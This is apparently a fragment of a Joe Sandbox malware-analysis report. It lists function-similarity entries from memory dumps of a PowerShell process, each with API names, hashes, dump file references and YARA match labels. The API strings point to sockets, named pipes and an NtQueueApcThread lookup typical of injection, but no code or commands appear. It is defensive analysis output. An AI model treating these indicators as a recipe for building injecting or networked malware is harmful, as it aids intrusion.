                                                    Similarity
                                                    • API ID: ErrorLast$CountNamedPipeTick$CreateDisconnectFileHandleSleepStateWait
                                                    • String ID:
                                                    • API String ID: 34948862-0
                                                    • Opcode ID: fe9bced31039d2455b0d079955692a562236962e25bf66d1b7588840a9b4026e
                                                    • Instruction ID: a02e4bae9faded3ac52bb2943b3c680d992426e2d493f9f66a9c5da8cc123118
                                                    • Opcode Fuzzy Hash: fe9bced31039d2455b0d079955692a562236962e25bf66d1b7588840a9b4026e
                                                    • Instruction Fuzzy Hash: D1415B36644A05E6EF10DBA1FA9875D23A9E38CBA4F524224DA1A4BFB4DF3CC445A700
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: free$Pointer$DecodeEncodeErrorFreeHeapLast_errno
                                                    • String ID:
                                                    • API String ID: 4099253644-0
                                                    • Opcode ID: f2c387d57ff385ba375dc00a6173171a26f2c39e06d74853e0125178de0f68c4
                                                    • Instruction ID: d326efd2cf76664ebcaa07d7465f40b7cc2dcc364891aca820e918ff13ec2602
                                                    • Opcode Fuzzy Hash: f2c387d57ff385ba375dc00a6173171a26f2c39e06d74853e0125178de0f68c4
                                                    • Instruction Fuzzy Hash: 1C31F525201B40B1FE54AFD1FA5C3A527A0EB8CB94F0A06259A1A1EFF1EF7CC445B321
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ApisByteCharErrorFileLastMultiPackagedWide__crt_dosmaperr_errno_getptd_noexit_invalid_parameter_noinfo
                                                    • String ID:
                                                    • API String ID: 1138158220-0
                                                    • Opcode ID: 05425721233f79f79091f3b96a0ee25a442efda7d0ba0e08876b468a33414fe7
                                                    • Instruction ID: 9d8c23c3cd5774b214a3a804d69176ef10ad4d97af70f3412c16c8766775c7aa
                                                    • Opcode Fuzzy Hash: 05425721233f79f79091f3b96a0ee25a442efda7d0ba0e08876b468a33414fe7
                                                    • Instruction Fuzzy Hash: 91319422300B45A2FF209FE9F65835D67E1AB8CB94F1645249A494BFF6DF3CC440A711
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CountTick$gethostbynamehtonsinet_addrselectsendto
                                                    • String ID: d
                                                    • API String ID: 1257931466-2564639436
                                                    • Opcode ID: ab0c442174a33fd942d7502bed514c8ee7f8710e336f335b2024a32b2463658a
                                                    • Instruction ID: 5bacc53b5b19f75485decfdf2a2520c4cd3299e2c02fbec906fef8ae7153be54
                                                    • Opcode Fuzzy Hash: ab0c442174a33fd942d7502bed514c8ee7f8710e336f335b2024a32b2463658a
                                                    • Instruction Fuzzy Hash: DB318F32214B85A6EF218FA1F98838A77A4F78CB84F011116EA8D4BF24DF78C555DB00
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EF9B10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22ef9b10000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: write_multi_char$write_string$free
                                                    • String ID:
                                                    • API String ID: 2630409672-3916222277
                                                    • Opcode ID: 1c8d6b8a065489df9c71b2e8ea70d157333f6dd13db57c526a3ea5ce9db962ed
                                                    • Instruction ID: 80dfc98412a3de38e3a32a7de1145f90028f2f7639cadfb9b9f1151653590b3f
                                                    • Opcode Fuzzy Hash: 1c8d6b8a065489df9c71b2e8ea70d157333f6dd13db57c526a3ea5ce9db962ed
                                                    • Instruction Fuzzy Hash: 3BA10722708654A5FF31CBE5D628BAE6BB4F7A5794F160005DEC917F98CB39C844EB08
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CountTick$ErrorLastSleepselectsend
                                                    • String ID: d
                                                    • API String ID: 2152284305-2564639436
                                                    • Opcode ID: 968d1f127f461a1dbb27dc7435d3ebfca4b5ec6114cfb3c6d112f4c985c4520d
                                                    • Instruction ID: 807254945ce4b0d2ec3709d69434ca479834c813b665ce8bfeb0b1c5113c9b41
                                                    • Opcode Fuzzy Hash: 968d1f127f461a1dbb27dc7435d3ebfca4b5ec6114cfb3c6d112f4c985c4520d
                                                    • Instruction Fuzzy Hash: 9A217C32214A81A6EF608FA1F98838A73A1F78C784F414225EB9D4BFA4DF3CC454DB44
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: File$CountErrorLastSleepTickWrite$BuffersDisconnectFlushNamedPipe
                                                    • String ID:
                                                    • API String ID: 3101085627-0
                                                    • Opcode ID: 2fa90bf5de3d4daae598bfc7d95f016883deb1b957d31e82556552939848cc78
                                                    • Instruction ID: be9e8cf1099eb8ddcd55848b401be81a38e40baf2ede53ccbec6a0000453533b
                                                    • Opcode Fuzzy Hash: 2fa90bf5de3d4daae598bfc7d95f016883deb1b957d31e82556552939848cc78
                                                    • Instruction Fuzzy Hash: DF414A22700945AAEF109FF5E69879C2361F74CB88F420126AE099BFB9DE3CC549E750
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EF9B10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22ef9b10000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: __doserrno_errno_getptd_noexit$_invalid_parameter_noinfo
                                                    • String ID:
                                                    • API String ID: 388111225-0
                                                    • Opcode ID: 9a7e94428e85d4ed5cd8e77b1af53c202f15bf406c2c29a1a7d54b8e8c205bff
                                                    • Instruction ID: 8ec6e5e2199752143b1a924499f2a51acdf5b495b6144fb0d8d8f100bf95d3e4
                                                    • Opcode Fuzzy Hash: 9a7e94428e85d4ed5cd8e77b1af53c202f15bf406c2c29a1a7d54b8e8c205bff
                                                    • Instruction Fuzzy Hash: 62313931B00644E5FF31EFE69EBAB6D3650A7A1B90F474125EA9117FC3CA78C441A718
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: __doserrno_errno_getptd_noexit$_invalid_parameter_noinfo
                                                    • String ID:
                                                    • API String ID: 388111225-0
                                                    • Opcode ID: 45b9cdfc7a25f1278b796800b15345f673bb2555b0332f4ab4807a0dfd005840
                                                    • Instruction ID: 5c137410c829bf5e0ee229d2ebb25bac19e548cbcf172b189fc7b540a1380409
                                                    • Opcode Fuzzy Hash: 45b9cdfc7a25f1278b796800b15345f673bb2555b0332f4ab4807a0dfd005840
                                                    • Instruction Fuzzy Hash: 1A31C023720741A6EB16AFE5BA5935D2550AB897A0F974514BA111FFE3CF3CC481A710
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EF9B10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22ef9b10000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _errno_getptd_noexit_invalid_parameter_noinfo
                                                    • String ID:
                                                    • API String ID: 1812809483-0
                                                    • Opcode ID: bd2089a42f628a497311986bb7142f0c797ae3413767483a07d765319bf433f4
                                                    • Instruction ID: f80dabe517a76c2a09795a5d716e9c1dc033c6f9ec2531cf19861cfcfa09fd98
                                                    • Opcode Fuzzy Hash: bd2089a42f628a497311986bb7142f0c797ae3413767483a07d765319bf433f4
                                                    • Instruction Fuzzy Hash: 25412275710751E1FF30EBE39B28BA972A0E774BA6FD24121EAD443EC5D728C841A708
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _errno_getptd_noexit_invalid_parameter_noinfo
                                                    • String ID:
                                                    • API String ID: 1812809483-0
                                                    • Opcode ID: f9c4d6ed39d3bdcb6b80e8c2d76cc2c0cca7aaaf292465ae2b9830194cf53d53
                                                    • Instruction ID: a7679a054c071b89869fe8e21eb602fa8165f87a900cb1504938d262f3715795
                                                    • Opcode Fuzzy Hash: f9c4d6ed39d3bdcb6b80e8c2d76cc2c0cca7aaaf292465ae2b9830194cf53d53
                                                    • Instruction Fuzzy Hash: 6341F87360035165FF60AF95B6183A93291EB5CB98F628121EA544FFE6DF3CC841E720
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Pointer$Decode$EncodeExitProcess$__crt_amsg_exit_mtinitlocknum
                                                    • String ID:
                                                    • API String ID: 1550138920-0
                                                    • Opcode ID: c0449f3fef6a4d8576451ebf1d27e0541d416188840e9d96df55a1b66d98fc2d
                                                    • Instruction ID: fa32f25c5fa858a9c798552bf5486396334a60aba4add4dbc3aa5c6b90db0c7c
                                                    • Opcode Fuzzy Hash: c0449f3fef6a4d8576451ebf1d27e0541d416188840e9d96df55a1b66d98fc2d
                                                    • Instruction Fuzzy Hash: 01418132212B45A3EE409F91FA8C31973A4F78CB84F464029998E4BF74DF7CC555A704
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                     • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmp
                                                     • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmp
                                                     • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmp
                                                     • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmp
                                                     • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: htons$ErrorLastclosesocketconnectgethostbynamehtonlioctlsocketsocket
                                                    • String ID:
                                                    • API String ID: 3339321253-0
                                                    • Opcode ID: 05f6a439e9e7b1774ef1c5ddc00099d5cfca8a0839fadce43f34e2615c209cd9
                                                    • Instruction ID: 230554bf769175d005c13906dd4eca4a61093ccb290ba61c559848aaf7f97440
                                                    • Opcode Fuzzy Hash: 05f6a439e9e7b1774ef1c5ddc00099d5cfca8a0839fadce43f34e2615c209cd9
                                                    • Instruction Fuzzy Hash: 22310662714641A2EF359FA1FA983AA6351F74CB94F111124EE0A4BFE4DF3CC545E700
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                     • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmp
                                                     • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmp
                                                     • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmp
                                                     • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmp
                                                     • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CountTick$freehtonlshutdown$ErrorLastacceptclosesocketioctlsocketmallocrecvfromselect
                                                    • String ID:
                                                    • API String ID: 3610715900-0
                                                    • Opcode ID: 1c403b153f4cdb51b3aa82c7904d7a2a385d985f1a2ac89a95e712731fd71160
                                                    • Instruction ID: ffa5af8febb542efdefabac7579104aca57f94cb5fdc9124e9ca371ead051d92
                                                    • Opcode Fuzzy Hash: 1c403b153f4cdb51b3aa82c7904d7a2a385d985f1a2ac89a95e712731fd71160
                                                    • Instruction Fuzzy Hash: 31311E31200A41E2EF619FA6FA8C32963B0E74CB84F2A5525DE494FF75DB3CC495A711
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EF9B10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22ef9b10000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _getptd_noexit$__doserrno__lock_fhandle_errno_lseeki64_nolock
                                                    • String ID:
                                                    • API String ID: 4140391395-0
                                                    • Opcode ID: 19101616f3e261a9beafbca214444aa2a5cb8e231afb96d714edbab2d78f6c11
                                                    • Instruction ID: 534966bcfe9796a891d41a1a4de8c8fe459df504574aaa0ddab7fd7353883352
                                                    • Opcode Fuzzy Hash: 19101616f3e261a9beafbca214444aa2a5cb8e231afb96d714edbab2d78f6c11
                                                    • Instruction Fuzzy Hash: FB21292230054071FF31AFE59AA9BAD7651A7A0FB1F0B4314EAB517BD2CB7CC441A728
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EF9B10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22ef9b10000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _getptd_noexit$__doserrno__lock_fhandle_errno_lseek_nolock
                                                    • String ID:
                                                    • API String ID: 310312816-0
                                                    • Opcode ID: 58556fb0ae643294109593e6a1f551c1d1756168c239dbf47c2b40feda9217b5
                                                    • Instruction ID: a2a1f6ddc6da6401c600f2893d9d0070394f1689c96f8238a8e401d077911cfe
                                                    • Opcode Fuzzy Hash: 58556fb0ae643294109593e6a1f551c1d1756168c239dbf47c2b40feda9217b5
                                                    • Instruction Fuzzy Hash: 64210B21B00540A5FF31EFE59AAEBAD6650A7A07A1F174114EA9507FD2CB78C841A71C
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                     • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmp
                                                     • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmp
                                                     • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmp
                                                     • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmp
                                                     • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _getptd_noexit$__doserrno__lock_fhandle_errno_lseek_nolock
                                                    • String ID:
                                                    • API String ID: 310312816-0
                                                    • Opcode ID: 689a55ff460a42ab0e8479ad490ad51203e5d8515b6f39f729bbcfe6708b8e94
                                                    • Instruction ID: f54d9f9b617956cdbe525644043f23ac4cc593405634832513fa0e3af55cde44
                                                    • Opcode Fuzzy Hash: 689a55ff460a42ab0e8479ad490ad51203e5d8515b6f39f729bbcfe6708b8e94
                                                    • Instruction Fuzzy Hash: 2121F03370024066FF166FE5BA493AD6661AB887B5F5B5114AA150FFF3CF7C8881A320
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                     • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmp
                                                     • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmp
                                                     • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmp
                                                     • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmp
                                                     • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _getptd_noexit$__doserrno__lock_fhandle_errno_lseeki64_nolock
                                                    • String ID:
                                                    • API String ID: 4140391395-0
                                                    • Opcode ID: b12dde97457ee21ef34638bcae53c6e161a46aae09bdd653f8f5ca1ee8b86ca4
                                                    • Instruction ID: 74a37f0deae5cc1fd1a1ab08c1dc7dfea59edd0e9c7b30c40c3e4bae36b12c63
                                                    • Opcode Fuzzy Hash: b12dde97457ee21ef34638bcae53c6e161a46aae09bdd653f8f5ca1ee8b86ca4
                                                    • Instruction Fuzzy Hash: 9821F92370064069FF166F95BA4936D7561AB88BB1F1B5718AA350FFF2CF3C8481A720
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EF9B10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22ef9b10000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: free$_errno
                                                    • String ID:
                                                    • API String ID: 2288870239-0
                                                    • Opcode ID: 819b4a270ea7d8595eaf9ac501f5b396dc923916a4c2f054388fd72371d1b91d
                                                    • Instruction ID: ea9e0da19f18427fd2c0d364bcf68c07cc2d24b2883e77d9f552799045f32253
                                                    • Opcode Fuzzy Hash: 819b4a270ea7d8595eaf9ac501f5b396dc923916a4c2f054388fd72371d1b91d
                                                    • Instruction Fuzzy Hash: 1C312B22201A44A1FE77DFD3EBBD36423A0EBB4791F5A022989DD06E95CF68C444A35D
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                     • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmp
                                                     • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmp
                                                     • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmp
                                                     • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmp
                                                     • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AddressCreateHandleModuleNextProcSleepSnapshotThread32Toolhelp32freemalloc
                                                    • String ID: NtQueueApcThread$ntdll
                                                    • API String ID: 1427994231-1374908105
                                                    • Opcode ID: 4682eb5fa987184764bf2e500015da157d39ace14d4a97c914713ac55f463483
                                                    • Instruction ID: 05ba0cc00f16dfdea423ce6d5890c1c0c00343f6842bf68d6faf68004a1b69fe
                                                    • Opcode Fuzzy Hash: 4682eb5fa987184764bf2e500015da157d39ace14d4a97c914713ac55f463483
                                                    • Instruction Fuzzy Hash: 79416932711B41A9EF20CBA1EA4879CB3A4BB4CB88F4641259E4C5BFA9EF3CC545D740
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EF9B10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22ef9b10000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _getptd_noexit$__doserrno__lock_fhandle_errno
                                                    • String ID:
                                                    • API String ID: 2611593033-0
                                                    • Opcode ID: 268773e762f2e10da4a59bd6545c27f05d9dc8848c407f150f864121acff7d22
                                                    • Instruction ID: 5f5e217383f83fc2556ac6a2c0d443e26d08b5f807dfe98ede1f5db070806560
                                                    • Opcode Fuzzy Hash: 268773e762f2e10da4a59bd6545c27f05d9dc8848c407f150f864121acff7d22
                                                    • Instruction Fuzzy Hash: B5213B2270854061FF31EFE59E6DBBD6650A7A0BA1F074214EA9907BD2CBB88441E768
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                     • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmp
                                                     • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmp
                                                     • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmp
                                                     • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmp
                                                     • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _getptd_noexit$__doserrno__lock_fhandle_errno
                                                    • String ID:
                                                    • API String ID: 2611593033-0
                                                    • Opcode ID: 1700ff755fa86426cee97dc6493a8bbd2f86863ab499d60c3e97554295ddf05f
                                                    • Instruction ID: 87d6bec50cba95738ddf97ef3d37bd09f0097fb1b9f8531888652046f90a91e1
                                                    • Opcode Fuzzy Hash: 1700ff755fa86426cee97dc6493a8bbd2f86863ab499d60c3e97554295ddf05f
                                                    • Instruction Fuzzy Hash: 0721F223B2024066FF166FA5BA4936D2950AB887A1F174114BA140FFF6DF7C8481A720
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                     • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmp
                                                     • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmp
                                                     • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmp
                                                     • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmp
                                                     • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _errno$BuffersErrorFileFlushLast__doserrno__lock_fhandle_getptd_noexit
                                                    • String ID:
                                                    • API String ID: 2289611984-0
                                                    • Opcode ID: c8931cb6991e1dcdb4b4beaef908be2012675e49725fd5fc40ebfddcb96b8d14
                                                    • Instruction ID: 13bdfdbe4c078e5a4cfced77f24639c8f42e46d1c4c0e90f1230faaa46557a6e
